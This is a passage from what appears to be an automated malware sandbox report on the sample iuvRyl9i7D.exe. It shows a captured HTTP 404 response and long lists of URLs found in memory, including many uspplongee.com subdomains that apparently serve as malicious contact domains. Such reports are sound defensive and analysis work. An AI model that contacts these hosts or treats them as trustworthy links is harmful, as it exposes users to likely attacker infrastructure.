HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:30:03 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>

Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ansu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://difo.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.wi5
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://epa.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://genzi.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://gonglang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://haileng.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://hanyang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://kace.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://kuaicong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://maipu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://meilong.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://mianta.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://nanmang.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://penjian.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://qiangai.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://qunben.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://randu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://rechan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://sangdu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://sanque.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://saoshui.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://shangeng.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://tanshuan.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://tuikun.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://weimen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://wudie.uspplongee.com/
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comadd
Source: iuvRyl9i7D.exe, 00000000.00000003.247918771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248081116.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248025845.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247762585.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247959832.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247722223.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247738889.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247797263.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247783561.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247944619.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247751500.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247697909.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248000108.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247981605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comdd
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comn-u
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com.TTF
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/Z
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlZ
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersC
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersV
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com:
Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300243537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comFU
Source: iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comI.TTF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250747109.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250726008.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comW.TTF
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253054220.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comals(
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 